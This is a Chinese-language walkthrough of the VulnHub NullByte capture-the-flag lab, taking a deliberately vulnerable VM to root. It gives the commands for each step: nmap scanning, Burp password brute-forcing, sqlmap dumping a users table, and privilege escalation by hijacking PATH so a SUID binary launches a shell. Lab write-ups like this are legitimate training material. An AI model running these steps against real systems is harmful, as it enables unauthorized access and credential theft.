介绍
系列:NullByte(此系列共1台)
发布日期:2015 年 8 月 1 日
难度:初级
运行环境:Virtualbox
目标:取得Root权限
学习:
- nmap漏扫脚本
- 暴力破解
- SQL注入
- 环境变量提权
靶机地址:https://www.vulnhub.com/entry/nullbyte-1,126/
信息收集
netdiscover主机发现
sudo netdiscover -i eth1 -r 192.168.56.0/24
主机信息探测
发现SSH运行在777端口
nmap -p- 192.168.56.109
nmap -p 80,111,777,56412 -A 192.168.56.109
nmap -p 80,111,777,56412 --script=vuln 192.168.56.109
网站探测
打开网站就是一个图片,页面源代码中有图片地址。
目录爆破没有发现有价值的信息,还是先看看图片吧,结果发现了一串字符。
wget http://192.168.56.109/main.gif
exiftool main.gif
尝试后发现这是一个网站目录,看起来需要一个密码才能登录进去。
暴力破解
使用BurpSuite进行暴力破解,字典选用的是rockyou,但是这个字典又太大,因此使用了SecLists中的\SecLists-2023.1\Passwords\Leaked-Databases\rockyou-70.txt
爆破出密码是:elite
SQL注入
登录后发现存在SQL注入,检查发现不存在cookie,那就好办了,直接sqlmap跑
sqlmap -u "http://192.168.56.109/kzMb5nVYJw/420search.php?usrtosearch=1" --dbs
sqlmap -u "http://192.168.56.109/kzMb5nVYJw/420search.php?usrtosearch=1" -D seth --tables
sqlmap -u "http://192.168.56.109/kzMb5nVYJw/420search.php?usrtosearch=1" -D seth -T users --columns
sqlmap -u "http://192.168.56.109/kzMb5nVYJw/420search.php?usrtosearch=1" -D seth -T users --dump
这段密文没法直接解出来,尝试后发现可以base64解码,最后解出对应明文是:omega
SSH登录
提权
根据命令行的历史记录,很轻松就找到了一个可疑的可执行文件。尝试运行,发现这个文件会调用其他文件
方式1
复制一个终端,并篡改环境变量
./procwatch
cp /bin/sh /tmp/ps
echo $PATH
export PATH=/tmp:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
./procwatch
方式2
本地新建一个终端,并篡改环境变量
echo "/bin/sh" > ps
chmod 777 ps
echo $PATH
export PATH=.:$PATH
echo $PATH
./procwatch